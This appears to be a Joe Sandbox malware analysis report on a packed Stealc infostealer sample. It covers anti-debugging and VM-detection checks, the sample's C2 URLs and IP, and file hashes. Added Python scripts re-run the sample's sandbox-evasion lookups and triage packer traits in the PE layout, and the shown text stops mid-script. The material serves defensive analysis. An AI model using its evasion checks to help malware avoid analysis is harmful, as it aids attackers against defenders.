Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_001BDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_001BE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_001BED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001C4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001BDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_001BBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BF68A FindFirstFileA,0_2_001BF68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001BF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001C3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001B16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001B1160 GetSystemInfo,ExitProcess,0_2_001B1160
Source: file.exe, file.exe, 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2074713980.0000000000F41000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWK,
Source: file.exe, 00000000.00000002.2074713980.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074713980.0000000000F41000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13746
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13749
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13769
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13801
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13761
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001B45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_001B45C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001C9860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C9750 mov eax, dword ptr fs:[00000030h] 0_2_001C9750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001C7850
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
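The checks recorded in this section (window class and title lookups for regmon/filemon/procmon/OllyDbg, opening the SoftICE device names NTICE/SICE/SIWVID, the DebugPort query) together with the registry reads from the evasion section above (SystemBiosVersion, VideoBiosVersion, the display-adapter DriverDesc, and the HARDWARE\ACPI\DSDT\VBOX__ key from the sample's strings) are what an analysis VM has to survive before this sample will run its stealer code. The script below is an added example, not the sample's code, that performs the same lookups on a Windows analysis VM and reports what the sample would see; flag_vm_markers is a pure function so the marker logic can be exercised on any platform. Two assumptions: the DebugPort query is approximated with CheckRemoteDebuggerPresent (which wraps the same ProcessDebugPort query), and the QEMU and VIRTUAL markers are additions beyond the VBOX, VMware and Hyper-V strings the report shows.

```python
"""Sandbox self-test for the analysis-environment checks this sample performs:
window class/title lookups, SoftICE device opens, the debug-port query and the
VM-revealing registry values.  Added example, not the sample's own code."""
import sys

# Window titles / class names the sample looks up (Anti Debugging section of the report).
WINDOW_NAMES = [
    "regmonclass",
    "gbdyllo",
    "process monitor - sysinternals: www.sysinternals.com",
    "procmon_window_class",
    "registry monitor - sysinternals: www.sysinternals.com",
    "ollydbg",
    "filemonclass",
    "file monitor - sysinternals: www.sysinternals.com",
]
# Legacy SoftICE device names the sample tries to open ("File opened: NTICE" etc.).
DEVICE_NAMES = ["NTICE", "SICE", "SIWVID"]
# Registry values the sample queries; the display-adapter class GUID is from the report.
REGISTRY_VALUES = [
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
    (r"SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000", "DriverDesc"),
]
# ACPI table key present in the sample's strings.
ACPI_KEYS = [r"HARDWARE\ACPI\DSDT\VBOX__"]
# VBOX, VMWARE and HYPER-V appear in the sample's memory strings; QEMU and VIRTUAL
# are assumed additions, not taken from the report.
VM_MARKERS = ("VBOX", "VMWARE", "HYPER-V", "QEMU", "VIRTUAL")


def flag_vm_markers(values):
    """values: {(key, name): data}; data is a str, or a list of str for REG_MULTI_SZ.
    Returns (key, name, marker) for every entry that exposes a hypervisor."""
    hits = []
    for (key, name), data in values.items():
        text = " ".join(data) if isinstance(data, (list, tuple)) else str(data)
        for marker in VM_MARKERS:
            if marker in text.upper():
                hits.append((key, name, marker))
                break
    return hits


def read_registry_values():
    """Collect the values the sample reads (Windows only)."""
    import winreg
    found = {}
    for key, name in REGISTRY_VALUES:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as h:
                found[(key, name)] = winreg.QueryValueEx(h, name)[0]
        except OSError:
            pass                                  # value absent: the sample sees nothing here
    for key in ACPI_KEYS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key):
                found[(key, "(key exists)")] = key  # the key name itself carries the marker
        except OSError:
            pass
    return found


def probe_windows():
    """Run the same lookups the sample does and report what it would see."""
    import ctypes
    from ctypes import wintypes
    user32, kernel32 = ctypes.windll.user32, ctypes.windll.kernel32
    user32.FindWindowA.argtypes = [wintypes.LPCSTR, wintypes.LPCSTR]
    user32.FindWindowA.restype = wintypes.HWND
    kernel32.CreateFileA.argtypes = [wintypes.LPCSTR, wintypes.DWORD, wintypes.DWORD,
                                     ctypes.c_void_p, wintypes.DWORD, wintypes.DWORD, ctypes.c_void_p]
    kernel32.CreateFileA.restype = wintypes.HANDLE
    kernel32.CloseHandle.argtypes = [wintypes.HANDLE]
    kernel32.GetCurrentProcess.restype = wintypes.HANDLE
    kernel32.CheckRemoteDebuggerPresent.argtypes = [wintypes.HANDLE, ctypes.POINTER(wintypes.BOOL)]
    invalid_handle = ctypes.c_void_p(-1).value    # INVALID_HANDLE_VALUE

    report = {"windows": [], "devices": [], "debugger": False, "vm_markers": []}
    for name in WINDOW_NAMES:                     # the sample tries both class name and title
        raw = name.encode()
        if user32.FindWindowA(raw, None) or user32.FindWindowA(None, raw):
            report["windows"].append(name)
    for dev in DEVICE_NAMES:                      # GENERIC_READ, share read/write, OPEN_EXISTING
        h = kernel32.CreateFileA(b"\\\\.\\" + dev.encode(), 0x80000000, 3, None, 3, 0, None)
        if h is not None and h != invalid_handle:
            kernel32.CloseHandle(h)
            report["devices"].append(dev)
    present = wintypes.BOOL()
    kernel32.CheckRemoteDebuggerPresent(kernel32.GetCurrentProcess(), ctypes.byref(present))
    report["debugger"] = bool(present.value)
    report["vm_markers"] = flag_vm_markers(read_registry_values())
    return report


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("run this on the Windows analysis VM")
    for k, v in probe_windows().items():
        print(f"{k:11}: {v}")
```

Run it inside the VM image before submitting samples: any non-empty list in the output is an artefact this sample (and anything else packed with the same protector) can use to bail out early, and the fix is to rename the monitoring tool windows, blank the BIOS version strings, and replace the VirtualBox display driver description rather than to patch the sample.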

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 4480, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_001C9600
Source: file.exe, file.exe, 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: M/Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_001C7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_001C6920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001C7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_001C7A30

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2029533452.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4480, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2029533452.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4480, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix: techniques with at least one matching signature, with the number of matching signatures in brackets (the remaining cells of the report's matrix are the unpopulated template).

Execution: Command and Scripting Interpreter [2]; Native API [11]
Persistence: DLL Side-Loading [1]
Privilege Escalation: Process Injection [11]; DLL Side-Loading [1]
Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [33]; Disable or Modify Tools [11]; Process Injection [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [12]; DLL Side-Loading [1]
Discovery: System Time Discovery [2]; Security Software Discovery [641]; Virtualization/Sandbox Evasion [33]; Process Discovery [13]; Account Discovery [1]; System Owner/User Discovery [1]; File and Directory Discovery [1]; System Information Discovery [324]
Collection: Archive Collected Data [1]
Command and Control: Encrypted Channel [2]; Ingress Tool Transfer [2]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact: no matching signatures
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37 | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
http://185.215.113.37/ws | 100% | URL Reputation | malware |
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37 | file.exe, 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpt5b | file.exe, 00000000.00000002.2074713980.0000000000F41000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpf | file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.378 | file.exe, 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php) | file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phph | file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php7 | file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp | true | | unknown

The entries with a stray character after ".php" or after the IP are string-scan overruns of the same two C2 URLs (http://185.215.113.37/e2b1563c6670f193.php and http://185.215.113.37/ws), not distinct endpoints.
Public IPs
IP               Domain    Country    ASN      ASN Name                 Malicious
185.215.113.37   unknown   Portugal   206894   WHOLESALECONNECTIONSNL   true
General Information
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1538175
Start date and time: 2024-10-20 18:12:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 85
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
Simulations: none

Context: IPs
Match: 185.215.113.37 (earlier submissions that contacted the same host)
Associated Sample Name   Detection   Threat Name                                                    Context
file.exe                 malicious   Stealc                                                         185.215.113.37/e2b1563c6670f193.php
file.exe                 malicious   Stealc, Vidar                                                  185.215.113.37/e2b1563c6670f193.php
file.exe                 malicious   LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc     185.215.113.37/e2b1563c6670f193.php
file.exe                 malicious   Stealc                                                         185.215.113.37/e2b1563c6670f193.php
file.exe                 malicious   Stealc, Vidar                                                  185.215.113.37/e2b1563c6670f193.php
file.exe                 malicious   Stealc                                                         185.215.113.37/e2b1563c6670f193.php
file.exe                 malicious   Stealc                                                         185.215.113.37/e2b1563c6670f193.php
file.exe                 malicious   Stealc, Vidar                                                  185.215.113.37/e2b1563c6670f193.php
file.exe                 malicious   Stealc                                                         185.215.113.37/e2b1563c6670f193.php
file.exe                 malicious   Stealc                                                         185.215.113.37/e2b1563c6670f193.php

Context: Domains
No context

Context: ASNs
Match: WHOLESALECONNECTIONSNL (AS206894)
Associated Sample Name   Detection   Threat Name                                                    Context
file.exe                 malicious   Stealc                                                         185.215.113.37
file.exe                 malicious   Stealc, Vidar                                                  185.215.113.37
file.exe                 malicious   LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc     185.215.113.16
file.exe                 malicious   Stealc                                                         185.215.113.37
file.exe                 malicious   Stealc, Vidar                                                  185.215.113.37
file.exe                 malicious   Stealc                                                         185.215.113.37
file.exe                 malicious   Stealc                                                         185.215.113.37
file.exe                 malicious   Stealc, Vidar                                                  185.215.113.37
file.exe                 malicious   Stealc                                                         185.215.113.37
file.exe                 malicious   Stealc                                                         185.215.113.37

Context: JA3 Fingerprints
No context

Context: Dropped Files
No context
Created / Dropped Files: none found

Static File Info
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.947964898540884 (close to the 8.0 ceiling: nearly the whole file is compressed or encrypted)
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'869'824 bytes
MD5: ffb497d86a175802a94beb58ef45bcbf
SHA1: 16e0858579f97e8efaf3adc83eb9c445848f2c81
SHA256: fecb47b6a0108dd26752fed4b29cf8f4d2b8833e07a2b7300e9fbe3047763d4d
SHA512: f65ba34f4500dcb2ac68d7f87ab8fddf796214dba26a00c94e58fac1e075181df332862d77e0b0580cf403cb97bf88871e26f7738e1b62f9e9d64cba231f3e74
SSDEEP: 24576:/QRGcv882kYDimLE5JwzBRUYYDDaF0eYl7cf4tGFxcro19iVWuKQycMUV2J3TVu2:/61rmLqJkVYDqB2cQLciVWuKQycnkD
TLSH: 7485337001AF3A72E6A1DD3F1ACF1E9A5AF45FE1B9C2EAC84469CE4094D466BC64C074
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xaaa000 (virtual address: image base 0x400000 plus RVA 0x6aa000, the start of the .taggant section)
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks: none
CLR (.Net) Version: none (native code)
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Entrypoint Preview (disassembly at 0xaaa000, .taggant)
Instruction
jmp 00007F2398B38D8Ah
pcmpgtd mm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F2398B3AD85h
add byte ptr [eax], al
(the remainder of the preview is the same instruction repeated: "add byte ptr [eax], al" is how the disassembler renders 00 00 byte pairs, so the entry section is mostly zero padding around two jumps into the unpacking stub, consistent with its 0.02 entropy)
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Data Directories
Name                                   Virtual Address   Virtual Size   Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0               0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0x25d050          0x64           .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x0               0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0               0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0               0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x25d1f8          0x8            .idata
IMAGE_DIRECTORY_ENTRY_DEBUG            0x0               0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0               0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0               0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0               0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0               0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x0               0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0               0x0
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0               0x0
Sections
Name       Virtual Address   Virtual Size   Raw Size   MD5                                Xored PE   ZLIB Complexity        File Type              Entropy                Characteristics
(blank)    0x1000            0x25b000       0x22800    3e2ca9e7db4c07aeabc305e79f1a7483   unknown    unknown                unknown                unknown                IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc      0x25c000          0x1000         0x0        d41d8cd98f00b204e9800998ecf8427e   False      0                      empty                  0.0                    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata     0x25d000          0x1000         0x200      c60c4959cc8d384ac402730cc6842bb0   False      0.1328125              data                   0.9064079259880791     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(blank)    0x25e000          0x2a8000       0x200      f3551077d7e06023a0c25bb281ba0501   unknown    unknown                unknown                unknown                IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qluozxrq   0x506000          0x1a3000       0x1a2600   7a1c6939b19d203263e5f964ac4db5e5   False      0.9947801902823424     data                   7.954062792540728      IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pbwitchi   0x6a9000          0x1000         0x400      6bd5d3d8d9ab77b04d4a5fa285001dc9   False      0.7978515625           data                   6.187769288853959      IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant   0x6aa000          0x3000         0x2200     cd1cb53ee2a0c9b3ed4f6a7ef7e0b827   False      0.006433823529411764   DOS executable (COM)   0.019571456231530684   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Five of the seven sections are mapped read/write/execute, two have blank names and two have random eight-letter names, the first section's virtual size (0x25b000) is far larger than its raw size (0x22800), qluozxrq holds 1.7 MB at entropy 7.95, and the entry point sits in .taggant rather than in a code section. That is the layout of a packed binary: the stub in .taggant decrypts qluozxrq into the oversized first section at run time and executes it from there.

Imports
DLL            Import
kernel32.dll   lstrcpy

A single static import is consistent with the unpacker resolving every other API through LoadLibraryA and GetProcAddress at run time, so the import hash (2eabe9054cad5152567f0699947a2c5b) fingerprints the packer stub, not the Stealc payload, and should not be used as a family indicator.
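As an added example (not part of the Joe Sandbox report), the following stdlib-only Python script shows how the packer traits visible in the section table above are checked programmatically. It builds a small PE32 image whose headers mirror this sample's layout: the section names, RVAs, virtual sizes and characteristics, the entry point RVA 0x6aa000, the 0x400000 image base and the 0x66F99A4A timestamp are taken from the report, while the raw section bytes are synthetic filler (so MD5s and exact entropies will not match the real file). It then parses the image back with `struct` and reports what a packer leaves behind: sections mapped RWX, blank or dot-less section names, an entry point outside the conventional code sections, a large virtual-to-raw size gap, and a near-8.0 entropy section. The `STANDARD_CODE_SECTIONS` set and the odd-name rule are this example's own assumptions.

```python
"""Static triage of a PE32 section table (added example, stdlib only).

The section layout mirrors the report's table; raw bytes are synthetic filler,
so hashes and exact entropies differ from the real file.
"""
import hashlib
import math
import struct
from collections import Counter
from datetime import datetime, timezone

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}  # this example's assumption


def _filler(n: int, seed: bytes = b"pe-triage") -> bytes:
    """Deterministic high-entropy bytes (SHA-256 in counter mode) standing in for packed data."""
    out = bytearray()
    for ctr in range((n + 31) // 32):
        out += hashlib.sha256(seed + ctr.to_bytes(4, "little")).digest()
    return bytes(out[:n])


def build_sample_pe() -> bytes:
    """Assemble a minimal PE32 whose section headers mirror the report (constructed input)."""
    # (name, RVA, virtual size, raw bytes, characteristics)
    sections = [
        (b"",         0x001000, 0x25b000, b"\x00" * 0x200, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX),
        (b".rsrc",    0x25c000, 0x001000, b"",             IMAGE_SCN_CNT_INITIALIZED_DATA | RW),
        (b".idata",   0x25d000, 0x001000, b"\x00" * 0x200, IMAGE_SCN_CNT_INITIALIZED_DATA | RW),
        (b"",         0x25e000, 0x2a8000, b"\x00" * 0x200, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX),
        (b"qluozxrq", 0x506000, 0x1a3000, _filler(0x1000), IMAGE_SCN_CNT_INITIALIZED_DATA | RWX),
        (b"pbwitchi", 0x6a9000, 0x001000, b"\x00" * 0x400, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX),
        (b".taggant", 0x6aa000, 0x003000, b"\x00" * 0x200, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX),
    ]
    entry_rva, image_base, timestamp = 0x6aa000, 0x400000, 0x66F99A4A
    opt_size = 0xE0                                              # standard PE32 optional header
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<HBBIIIIIII", 0x10B, 10, 0, 0, 0, 0, entry_rva, 0x1000, 0x25c000, image_base)
    opt += b"\x00" * (opt_size - len(opt))                       # data directories left zeroed
    headers_end = len(dos) + 4 + len(coff) + len(opt) + 40 * len(sections)
    raw_base = (headers_end + 0x1FF) & ~0x1FF                     # FileAlignment 0x200
    table, blob = b"", b""
    for name, rva, vsize, raw, chars in sections:
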